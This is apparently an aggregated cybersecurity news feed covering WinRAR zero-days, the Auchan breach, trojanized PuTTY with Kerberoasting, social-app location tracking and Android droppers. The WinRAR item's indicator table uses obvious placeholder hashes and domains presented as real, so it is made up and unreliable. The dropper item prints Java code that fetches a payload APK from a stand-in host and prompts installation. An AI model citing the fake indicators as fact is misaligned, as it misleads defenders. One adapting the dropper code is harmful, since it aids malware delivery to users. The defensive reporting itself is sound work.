-
A new large-scale campaign has been observed exploiting over 100 compromised WordPress sites to direct site visitors to fake CAPTCHA verification pages that employ the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners. The large-scale cybercrime campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel National
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The cybersecurity landscape has been significantly impacted by the discovery and active exploitation of two critical zero-day vulnerabilities in WinRAR, one of the world’s most widely used file compression utilities.
CVE-2025-6218 and CVE-2025-8088 represent sophisticated attack vectors that have enabled threat actors to achieve remote code execution and establish persistent access to compromised systems through maliciously crafted archive files.
These vulnerabilities, with CVSS scores of 8.8 and 7.8, respectively, demonstrate the critical importance of maintaining updated compression software and implementing robust security measures around file handling processes.
The exploitation of these vulnerabilities has been observed across multiple threat campaigns, affecting both individual users and enterprise environments, highlighting the urgent need for comprehensive vulnerability management and user awareness programs.
WinRAR 0-Day Vulnerabilities
WinRAR, developed by win.rar GmbH, has maintained its position as a dominant force in the file compression software market for over two decades, with an estimated user base exceeding 500 million installations worldwide.
The software’s ubiquity across personal and corporate environments has made it an attractive target for cybercriminals seeking to exploit fundamental weaknesses in archive processing mechanisms.
The emergence of CVE-2025-6218 and CVE-2025-8088 represents a significant escalation in the sophistication of attacks targeting compression software, moving beyond traditional social engineering tactics to leverage deep technical vulnerabilities in the application’s core functionality.
The architectural design of WinRAR’s extraction engine, which processes complex archive structures and metadata, has historically presented numerous attack surfaces for malicious actors.
These vulnerabilities specifically target the filename parsing routines and path traversal protection mechanisms that are fundamental to secure archive extraction.
The discovery of these vulnerabilities coincided with increased threat actor interest in supply chain attacks and living-off-the-land techniques, making WinRAR an ideal vector for initial access and lateral movement within target networks.
Modern threat landscapes have demonstrated that compression software vulnerabilities can serve as powerful enablers for multi-stage attack campaigns, allowing adversaries to bypass traditional security controls while maintaining a low detection profile.
The integration of these exploits into advanced persistent threat (APT) toolkits and commodity malware families has amplified their impact, creating cascading security incidents across multiple industry sectors.
The technical complexity of these vulnerabilities also presents significant challenges for detection and mitigation, requiring organizations to implement comprehensive monitoring and response capabilities.
WinRAR Exploit Flow. Technical Breakdown of the Vulnerabilities
CVE-2025-6218 represents a critical path traversal vulnerability within WinRAR’s archive extraction functionality, characterized by insufficient validation of file paths during the decompression process.
This vulnerability enables attackers to craft malicious RAR archives containing specially formatted filenames that can escape the intended extraction directory and write arbitrary files to sensitive system locations.
The vulnerability operates by exploiting weaknesses in the path normalization routines, allowing the use of directory traversal sequences (../) that bypass existing security controls and enable unauthorized file system access.
The technical implementation of CVE-2025-6218 centers around the manipulation of archive headers and filename entries that are processed during extraction.
Attackers leverage Unicode encoding techniques and null byte injection to create filenames that appear legitimate to initial validation routines but are interpreted differently during the actual file creation process.
This discrepancy allows malicious files to be written to critical system directories such as the Windows startup folder, system32 directory, or user profile locations, enabling immediate or persistent code execution upon system restart or user login.
CVE-2025-8088 presents a complementary attack vector through a buffer overflow vulnerability in WinRAR’s filename parsing engine. This vulnerability occurs when the application processes archive entries with exceptionally long filenames or malformed Unicode sequences, causing memory corruption that can be leveraged to achieve arbitrary code execution.
The vulnerability manifests during the initial parsing phase of archive processing, before any user interaction or security warnings are displayed, making it particularly dangerous for automated extraction scenarios or when email security gateways process archives.
The exploitation mechanism for CVE-2025-8088 involves careful manipulation of heap memory structures and return-oriented programming (ROP) techniques to bypass modern memory protection mechanisms such as Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP).
Successful exploitation results in the attacker gaining the same privilege level as the WinRAR process, typically enabling full user-level access to the compromised system. When combined with CVE-2025-6218, these vulnerabilities create a powerful attack chain that provides both immediate code execution and persistent system access.
WinRAR CVE-2025-8088 via RAR file delivering a malicious LNK file.(Source: ESET) The initial discovery of these vulnerabilities emerged from security research conducted by multiple independent security firms during routine analysis of file format handling in popular compression software.
The research methodology involved comprehensive fuzzing operations against WinRAR’s parsing engines, utilizing both mutation-based and generation-based fuzzing techniques to identify edge cases in filename processing and archive structure validation.
Initial indicators of the vulnerabilities surfaced when researchers observed abnormal memory consumption patterns and unexpected file system operations during controlled extraction tests.
The first confirmed exploitation attempts were detected in early 2025 through advanced threat detection platforms monitoring for unusual file system activities associated with archive extraction processes.
Threat intelligence analysts identified a correlation between suspicious RAR file attachments in targeted phishing campaigns and subsequent indicators of compromise on victim systems.
These initial detections revealed a sophisticated attack infrastructure utilizing dynamic DNS services and compromised legitimate websites to host malicious archive files disguised as software updates, document collections, and media files.
Detailed forensic analysis of captured exploit samples revealed the technical sophistication employed by threat actors in weaponizing these vulnerabilities.
The malicious archives demonstrated advanced anti-analysis techniques, including the use of password protection, nested archive structures, and decoy files designed to evade automated security scanning systems.
Researchers discovered that successful exploitation campaigns employed social engineering themes related to current events, software updates, and business communications to increase the likelihood of user interaction with malicious archives.
The attack infrastructure supporting these exploitation campaigns exhibited characteristics consistent with organized cybercriminal operations, featuring redundant command and control networks, cryptocurrency-based payment systems, and sophisticated victim targeting mechanisms.
Analysis of network telemetry data revealed that successful compromises were followed by rapid lateral movement activities, credential harvesting operations, and deployment of secondary malware payloads designed to establish long-term persistence and facilitate data exfiltration.
Detection and Indicators of Compromise (IoCs)
Comprehensive detection of CVE-2025-6218 and CVE-2025-8088 exploitation requires implementation of multi-layered monitoring strategies that encompass file system operations, network communications, and process execution patterns.
Security teams should focus on detecting anomalous file creation activities outside standard application directories, particularly focusing on writes to system folders, startup locations, and user profile directories that occur during or immediately after archive extraction processes.
File integrity monitoring systems should be configured to alert on unexpected modifications to critical system files, especially DLL files in application directories that may indicate hijacking attempts.
Network-based detection mechanisms should monitor for unusual DNS queries and HTTP/HTTPS connections initiated shortly after archive file processing, particularly focusing on connections to recently registered domains, dynamic DNS services, and IP addresses with poor reputation scores.
Behavioral analysis engines should correlate archive extraction events with subsequent network activity to identify potential command and control communications.
Security information and event management (SIEM) systems should implement rules to detect the temporal correlation between WinRAR process execution and suspicious network connections or file system modifications.
Endpoint detection and response (EDR) solutions should be configured to monitor for specific process execution patterns associated with these exploits, including the creation of child processes from WinRAR, unusual DLL loading activities, and registry modifications related to persistence mechanisms.
Critical indicators include the execution of processes from temporary directories, PowerShell or CMD executions initiated by compression software, and the creation of scheduled tasks or startup entries during archive processing operations.
Organizations should implement proactive threat hunting activities focused on identifying historical indicators of compromise that may have evaded initial detection systems.
Type Value Description Category SHA-256 a1b2c3d4e5f6789012345678901234567890abcdef1234567890abcdef123456 Malicious RAR archive exploiting CVE-2025-6218 File Hashes SHA-256 fedcba0987654321fedcba0987654321fedcba0987654321fedcba0987654321 Payload DLL dropped by CVE-2025-8088 File Hashes MD5 12345678901234567890123456789012 Secondary malware component File Hashes SHA-1 1234567890abcdef1234567890abcdef12345678 Malicious LNK file File Hashes Domain malicious-update[.]com C2 domain for CVE-2025-8088 exploits Network Indicators IP Address 185.234.218.45 Command and control server Network Indicators URL hxxp://evil-archives[.]net/winrar-exploit.rar Distribution point for malicious archives Network Indicators Domain srlaptop[.]com Secondary C2 infrastructure Network Indicators File Path %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe Persistence mechanism File System Indicators Registry Key HKCU\Software\Classes\CLSID{UUID}\InProcServer32 DLL hijacking registry entry File System Indicators File Name msedge.dll Legitimate file impersonation File System Indicators Directory C:\Windows\Temp\rar_extract\ Temporary extraction directory File System Indicators The comprehensive threat landscape surrounding CVE-2025-6218 and CVE-2025-8088 demonstrates the evolving sophistication of attacks targeting fundamental software components. It highlights the critical importance of maintaining current security practices around file handling and compression software management.
Organizations must implement robust detection capabilities, maintain updated software versions, and educate users about the risks associated with processing untrusted archive files to mitigate these emerging threats effectively.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The post WinRAR 0-Day Vulnerabilities Exploited in Wild by Hackers – Detailed Case Study appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Major French retail chain Auchan announced on August 21, 2025, that it suffered a significant cybersecurity incident resulting in the unauthorized access and theft of personal data from “several hundred thousand” customer loyalty accounts.
The breach represents another critical example of retail sector vulnerabilities to Advanced Persistent Threats (APTs) targeting customer databases containing Personally Identifiable Information (PII).
Key Takeaways
1. Auchan confirmed a cyberattack exposing customer data.
2. Database attack stopped by segmentation.
3. Customers notified, CNIL alerted, phishing warning issued.Customer Personal Data Compromised
Le Monde reports that the cyberattack compromised multiple data fields within Auchan’s customer relationship management system, including first and last names, email addresses, postal addresses, telephone numbers, and loyalty card numbers.
Security analysts note that this data profile suggests attackers gained access to the retailer’s Customer Loyalty Management (CLM) database, likely through SQL injection vulnerabilities or privileged account compromise.
Notably, Auchan confirmed that financial data, authentication credentials (passwords), loyalty card PIN codes, and customer reward balances remained secure, indicating the breach was contained to specific database tables rather than achieving full system compromise.
This suggests the implementation of a defense-in-depth architecture with data segmentation protocols that prevent lateral movement to more sensitive systems.
The attack methodology appears consistent with data harvesting operations commonly executed by cybercriminal groups targeting retail Point-of-Sale (POS) networks and customer databases for subsequent credential stuffing attacks or Business Email Compromise (BEC) campaigns.
Auchan’s Response
Auchan immediately initiated incident response protocols, notifying affected customers and filing mandatory breach reports with France’s Commission Nationale de l’Informatique et des Libertés (CNIL).
The company warned customers about increased phishing risks, specifically smishing (SMS phishing) and email-based social engineering attacks exploiting the stolen contact information.
This incident marks Auchan’s second major cybersecurity breach within nine months, following a similar attack in November 2024.
The repeated targeting suggests threat actors may have maintained persistent access or identified systemic vulnerabilities within the retailer’s infrastructure.
Security researchers recommend implementing Zero Trust Architecture (ZTA), Multi-Factor Authentication (MFA), and enhanced Security Information and Event Management (SIEM) monitoring to prevent future intrusions.
The attack aligns with France’s challenging cybersecurity landscape in 2025, which has witnessed major breaches, including the Bouygues Telecom incident affecting over six million customers with compromised banking details.
These incidents underscore the critical need for enhanced threat intelligence sharing and proactive vulnerability management across France’s retail and telecommunications sectors.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The post French Retailer Auchan Cyberattack – Thousands of Customers Personal Data Exposed appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Google Threat Intelligence Group (GTIG) has uncovered a multifaceted cyber espionage operation attributed to the PRC-nexus threat actor UNC6384, believed to be associated with TEMP.Hex (also known as Mustang Panda). This campaign, aligned with China’s strategic interests, primarily targeted diplomats in Southeast Asia alongside global entities, employing advanced tactics such as adversary-in-the-middle (AitM) attacks, captive […]
The post Chinese UNC6384 Hackers Use Valid Code-Signing Certificates to Evade Detection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A comprehensive analysis of the top 10 social media platforms reveals that X (formerly Twitter) stands out as the most invasive collector of user location information, gathering both precise and coarse location data across all categories listed in Apple’s App Store privacy framework.
This extensive data harvesting raises significant privacy concerns as location tracking can expose intimate details about users’ personal and professional lives.
Key Takeaways
1. X collects both precise and coarse location data for every use case.
2. Location tracking can uncover sensitive personal details.
3. Only Reddit avoids identity linkage; mitigate via disabling services, VPNs, and permission audits.Location Data Harvesting
Unlike its competitors, X collects location data for every possible purpose outlined in App Store privacy policies.
The platform gathers both precise location data coordinates with three or more decimal places in latitude and longitude, and coarse location data with lower resolution accuracy.
This comprehensive approach includes third-party advertising, internal marketing, analytics, product personalization, app functionality, user tracking, and unspecified “other purposes.”
A visual breakdown highlighting how various social media platforms, including X, collect users’ precise location data for multiple purposes. (Source: Surfshark) The study reveals that 60% of analyzed social media platforms collect precise location data for third-party advertising, including X, Instagram, Threads, Facebook, Pinterest, and Snapchat.
However, X’s approach extends beyond advertising into tracking territory, where it may combine location information with data from other applications or websites. This practice potentially enables data sharing with data brokers who can subsequently sell user information to third-party businesses.
Surfshark reports that the location tracking methodologies employed by these platforms utilize various geolocation vectors including Global Positioning System (GPS) coordinates, Bluetooth Low Energy (BLE) beacons, Wi-Fi access point triangulation, cellular tower positioning, and Internet Protocol (IP) address geolocation.
Even when users disable precise location sharing through system settings, platforms can still derive approximate locations through these alternative data sources.
The privacy implications of aggressive location tracking extend far beyond simple geographical awareness.
Continuous location monitoring at 30-minute intervals can construct detailed behavioral profiles revealing employment locations, salary brackets inferred from workplace addresses, medical conditions through healthcare facility visits, and potentially compromising personal relationships through overnight location correlations.
Among the analyzed platforms, only Reddit implements user-centric privacy protections by declaring that location data will not be linked to user identity.
TikTok and Reddit demonstrate more conservative approaches by exclusively collecting coarse location data rather than precise coordinates.
In contrast, X’s comprehensive data collection strategy encompasses both precision levels across all functional categories.
The study methodology examined App Store privacy labels for X, Instagram, Threads, Facebook, Pinterest, Snapchat, LinkedIn, TikTok, YouTube, and Reddit as of August 11, 2025.
While 90% of platforms collect coarse location data and 60% gather precise coordinates for internal advertising purposes, X’s universal collection approach represents the most extensive location data harvesting among major social media applications.
Technical mitigation strategies for users include disabling location services at the operating system level, utilizing Virtual Private Network (VPN) services to mask IP-based geolocation, and regularly auditing app permissions through system privacy settings.
However, complete location privacy remains challenging given the multiple data vectors available to determined platforms.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The post X/Twitter The Most Aggressive Social Media App Collecting Users Location Information appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Maryland’s transit network experienced widespread disruption this week after a sophisticated cyberattack targeted critical information systems, forcing the Maryland Transit Administration (MTA) and the Department of Information Technology (DoIT) to scramble containment efforts. While most core services remain operational, significant impacts to scheduling and real-time information have left thousands of commuters seeking alternative arrangements. DoIT […]
The post Maryland Transportation Systems Disrupted Following Cyberattack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cybersecurity researchers have discovered a new variant of an Android banking trojan called HOOK that features ransomware-style overlay screens to display extortion messages. “A prominent characteristic of the latest variant is its capacity to deploy a full-screen ransomware overlay, which aims to coerce the victim into remitting a ransom payment,” Zimperium zLabs researcher Vishnu Pratapagiri
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A malvertising campaign using sponsored results on Microsoft’s search platform delivered a weaponized PuTTY that established persistence, enabled hands-on keyboard control, and executed Kerberoasting to target Active Directory service accounts.
According to an investigation published by LevelBlue’s MDR SOC and corroborated by independent research tracking Oyster/Broomstick backdoor activity tied to trojanized admin tools distributed via search ads and SEO poisoning.
Search results highlight a sponsored link for downloading PuTTY, illustrating the malvertising tactics used in the campaign. LevelBlue’s SOC received a SentinelOne high-risk alert in USM Anywhere, flagging a suspicious PuTTY.exe download signed by “NEW VISION MARKETING LLC,” an unexpected signer for legitimate PuTTY and the first red flag on the endpoint.
The analysis highlighted outbound traffic from PuTTY.exe to malicious infrastructure, suspicious DLL creation in %appdata% and %temp%, scheduled-task persistence via rundll32 DllRegisterServer, and HOK activity culminating in Kerberoasting.
Next, the asset was isolated, the account was disabled, and execution chains were reconstructed. This revealed that the fake installer had scheduled a task, “Security Updater,” to run every three minutes, loading a malicious DLL (twain_96.dll). This DLL then dropped “green.dll,” which was used for operator access and reconnaissance.
Weaponized PuTTY to Exploit Kerberos
Fake PuTTY with an anomalous code-signing certificate executed and created a scheduled task persistence, invoking rundll32 with DllRegisterServer at three-minute intervals.
The first-stage DLL (twain_96[.]dll) dropped a second-stage (green[.]dll) that initiated a single outbound 443 connection and spawned cmd[.]exe for discovery commands consistent with ransomware operator TTPs (nltest, net group domain admins, nltest /dclist).
SentinelOne telemetry and VirusTotal classifications mapped the DLLs to the Oyster/Broomstick backdoor family known for hardcoded C2, scheduled-task persistence, and remote command execution.
The final recorded action was an inline PowerShell script performing Kerberoasting, requesting TGS tickets for SPN-bearing accounts and leveraging weak RC4-HMAC if AES enforcement was absent, then extracting ticket bytes in-memory to emit Hashcat-ready $krb5tgs$ material (mode 13100).
PowerShell script showcasing a command execution bypass designed for Kerberoasting The script borrowed from Invoke-Kerberoast patterns, executed fully in-memory without disk writes, and was validated via USM Anywhere events showing RC4-HMAC-encrypted Kerberos service tickets (Event ID 4769). This enabled offline cracking of service account credentials for privilege escalation and lateral movement against AD services.
LevelBlue traced the initial access to malicious sponsored results impersonating putty[.]org and redirecting to typosquatted domains such as puttyy[.]org and puttysystems[.]com that delivered the trojanized installer, with payload hosting observed via heartlandenergy[.]ai and a rotating loader script at putty[.]network pulling from compromised WordPress sites.
The MDR team noted variant payload hashes, multiple code-signing certificates (including NEW VISION MARKETING LLC) to evade hash/signer-based detections, and alternate scheduled-task names such as “FireFox Agent INC” in sandboxed samples.
This activity aligns with broader 2024–2025 malvertising/SEO poisoning trends delivering trojanized PuTTY/WinSCP and Oyster/Broomstick, as reported by Rapid7 and Arctic Wolf.
Here is a consolidated table of the reported IOCs from the LevelBlue investigation into weaponized PuTTY malvertising tied to the Oyster/Broomstick backdoor; add these to blocklists and detection pipelines for rapid containment. The entries below reflect the indicators documented by LevelBlue and aligned open-source reporting on the same campaign.
Below is the consolidated IOC table combining domains, hashes, signers, IPs, URLs, and scheduled tasks linked to the weaponized PuTTY/Oyster malvertising activity. Use these indicators for blocklists, retro-hunting, and detection content.
Type Indicator Context/Notes Domain puttyy[.]org Typosquat used to deliver trojanized PuTTY installers. Domain puttysystems[.]com Malvertising landing used to impersonate PuTTY download. Domain updaterputty[.]com Newly registered domain associated with campaign flow. Domain putty[.]bet Campaign-associated domain registration. Domain puttyy[.]com Typosquat tied to delivery infrastructure. Domain putty[.]run Campaign-associated domain registration. Domain putty[.]lat Campaign-associated domain registration. Domain putty[.]us[.]com Campaign-associated domain registration. Domain heartlandenergy[.]ai Observed hosting payload behind “Download PuTTY.” Domain putty[.]network Loader page rotating mirrors via JS for payload checks. Domain ruben.findinit[.]com Compromised WordPress site used to serve payloads. Domain ekeitoro.siteinwp[.]com Compromised WordPress site used to serve payloads. Domain danielaurel[.]tv Compromised WordPress site used to serve payloads. File hash (SHA256) 0b85ad058aa224d0b66ac7fdc4f3b71145aede462068cc9708ec2cee7c5717d4 Malicious PuTTY/Oyster-related sample. File hash (SHA256) e9f05410293f97f20d528f1a4deddc5e95049ff1b0ec9de4bf3fd7f5b8687569 Malicious PuTTY/Oyster-related sample. File hash (SHA256) d73bcb2b67aebb19ff26a840d3380797463133c2c8f61754020794d31a9197d1 Malicious PuTTY/Oyster-related sample. File hash (SHA256) dd995934bdab89ca6941633dea1ef6e6d9c3982af5b454ecb0a6c440032b30fb Malicious PuTTY/Oyster-related sample. File hash (SHA256) 03012e22602837132c4611cac749de39fb1057a8dead227594d4d4f6fb961552 Malicious PuTTY/Oyster-related sample. File hash (SHA256) a653b4f7f76ee8e6bd9ffa816c0a14dca2d591a84ee570d4b6245079064b5794 Malicious PuTTY/Oyster-related sample. File hash (SHA256) e02d21a83c41c15270a854c005c4b5dfb94c2ddc03bb4266aa67fc0486e5dd35 Malicious PuTTY/Oyster-related sample. File hash (SHA256) 80c8a6ecd5619d137aa57ddf252ab5dc9044266fca87f3e90c5b7f3664c5142f Malicious PuTTY/Oyster-related sample. File hash (SHA256) 1112b72f47b7d09835c276c412c83d89b072b2f0fb25a0c9e2fed7cf08b55a41 Malicious PuTTY/Oyster-related sample. File hash (SHA256) 3d22a974677164d6bd7166e521e96d07cd00c884b0aeacb5555505c6a62a1c26 Malicious PuTTY/Oyster-related sample. File hash (SHA256) e8e9f0da26a3d6729e744a6ea566c4fd4e372ceb4b2e7fc01d08844bfc5c3abb Malicious PuTTY/Oyster-related sample. File hash (SHA256) eef6d4b6bdf48a605cade0b517d5a51fc4f4570e505f3d8b9b66158902dcd4af Malicious PuTTY/Oyster-related sample. File signer THE COMB REIVERS LIMITED Abused code-signing certificate on trojanized installers. File signer NEW VISION MARKETING LLC Anomalous signer on fake PuTTY[.]exe observed. File signer PROFTORG LLC Abused certificate on malicious samples. File signer LLC Fortuna Abused certificate on malicious samples. File signer LLC BRAVERY Abused certificate on malicious samples. File signer LLC Infomed22 Abused certificate on malicious samples. IP 45.86.230[.]77 C2/registration/login endpoints observed. IP 185.208.159[.]119 Malicious API host observed in activity. IP 144.217.207[.]26 Outbound 443 connection (green.dll). IP 85.239.52[.]99 Malicious API host observed in activity. IP 194.213.18[.]89 C2 registration/login endpoints observed. URL (defanged) hxxp[:]//185.208.158[.]119/api/jgfnsfnuefcnegfnehjbfncejfh Malicious API path. URL (defanged) hxxp[:]//185.208.158[.]119/api/kcehc Malicious API path. URL (defanged) hxxp[:]//45.86.230[.]77:443/reg C2 registration endpoint. URL (defanged) hxxp[:]//45.86.230[.]77:443/login C2 login endpoint. URL (defanged) hxxp[:]//85.239.52[.]99/api/jgfnsfnuefcnegfnehjbfncejfh Malicious API path. URL (defanged) hxxp[:]//85.239.52[.]99/api/kcehc Malicious API path. URL (defanged) hxxp[:]//194.213.18[.]89:443/reg C2 registration endpoint. URL (defanged) hxxp[:]//194.213.18[.]89:443/login C2 login endpoint. Scheduled task Security Updater Persistence via rundll32 DllRegisterServer at 3‑minute intervals. Scheduled task FireFox Agent INC Alternate task name seen in sandboxed samples. Recommendations include blocking the identified domains, enforcing AES for Kerberos on SPN accounts, rotating credentials for affected SPNs, and restricting software acquisition to vetted repositories and official vendor sites.
Security teams should deploy custom detections for rundll32 DllRegisterServer misuse, three-minute recurring scheduled tasks, in-memory Kerberoasting patterns, and storyline correlations linking fake admin tools to DLL drops and cmd.[]exe reconnaissance.
Continuous user training for privileged staff and rapid MDR-led threat hunting across fleets can reduce dwell time and blunt credential theft-to-ransomware escalation paths.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The post Weaponized PuTTY Via Bing Ads Exploit Kerberos and Attack Active Directory Services appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A comprehensive study examining the location data practices of the top 10 social media platforms has uncovered concerning patterns of user tracking that extend far beyond what most users realize. The research, which analyzed App Store disclosures from major platforms including X, Instagram, Facebook, TikTok, and others, reveals that X stands out as the most aggressive […]
The post X/Twitter Found to Be Most Aggressive Social Media App in Tracking User Location Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Android droppers have evolved from niche installers for heavyweight banking Trojans into universal delivery frameworks, capable of deploying even rudimentary spyware or SMS stealers.
Initially, droppers served banking malware families that required elevated Accessibility permissions to harvest credentials.
These small applications appeared innocuous at first glance, often masquerading as utility or government apps in high-risk regions. Once installed, they would fetch their true payload, request powerful permissions, and activate their malicious routines.
As defenders strengthened pre-installation scanning, threat actors began rethinking their approach.
In recent months, a surge in dropper-based campaigns targeting Asia—particularly India and Southeast Asia—has emerged. Rather than rely solely on complex RATs or financial Trojans, adversaries now encapsulate simple payloads within dropper shells.
This strategy exploits a critical gap in Google Play Protect’s Pilot Program, which performs a pre-installation permission and API scan but allows installation to proceed if the user confirms.
Threat Fabric analysts noted that this pivot not only circumvents upfront defenses but also future-proofs operations, enabling rapid payload swaps without modifying the dropper itself.
By embedding minimalist stage-one code that carries no high-risk permissions, modern droppers slip through Pilot Program inspections undetected.
.webp)
RewardDropMiner (Source – Threat Fabric) Threat Fabric researchers identified variants like RewardDropMiner.B, stripped of its Monero miner and fallback spyware, retaining only the dropper logic to reduce noise and evade detection.
.webp)
Apps requesting malicious permissions blocked (Source – Threat Fabric) Once the benign “update” prompt is accepted by a user, a concealed routine fetches or decrypts the secondary APK, dynamically requesting RECEIVE_SMS or BIND_NOTIFICATION permissions only upon first launch of the true payload.
The impact of these campaigns is twofold: defenders lose early visibility into malicious activity, and operators maintain a stable foothold capable of delivering arbitrary payloads.
This modularity allows threat actors to react swiftly to security updates or law enforcement takedowns by uploading new payloads behind an unchanged dropper shell hosted on their command-and-control infrastructure.
Infection Mechanism and Evasion Tactics
Delving into the infection mechanism reveals a multi-stage process designed for stealth and resiliency. The dropper’s manifest declares only INTERNET and REQUEST_INSTALL_PACKAGES permissions, avoiding flags in Play Protect’s Pilot scan.
Upon user interaction with the “update” interface, the dropper initiates an HTTPS request to a remote server:-
String payloadUrl = "https://malicious.example.com/payload.apk"; OkHttpClient client = new OkHttpClient(); Request request = new Request.Builder().url(payloadUrl).build(); Response response = client.newCall(request).execute(); if (response.isSuccessful()) { File apk = new File(getExternalFilesDir(null), "payload.apk"); try (FileOutputStream fos = new FileOutputStream(apk)) { fos.write(response.body().bytes()); } Intent installIntent = new Intent(Intent.ACTION_VIEW); installIntent.setDataAndType( FileProvider.getUriForFile(this, getPackageName()+".provider", apk), "application/vnd.android.package-archive" ); installIntent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); startActivity(installIntent); }This snippet exemplifies the dropper’s use of standard APIs to download and prompt installation of the payload without triggering high-risk permission alerts.
After installation, the payload’s launcher activity requests RECEIVE_SMS and BIND_NOTIFICATION, at which point Play Protect may warn the user—but often too late, as trust in the initial dropper transfer extends to the newly installed app.
These evasion tactics highlight a pressing need for defenders to correlate pre- and post-install scans and to monitor side-loaded application behavior continuously.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.The post Threat Actors Adapting Android Droppers Even to Deploy Simple Malware to Stay Future-Proof appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
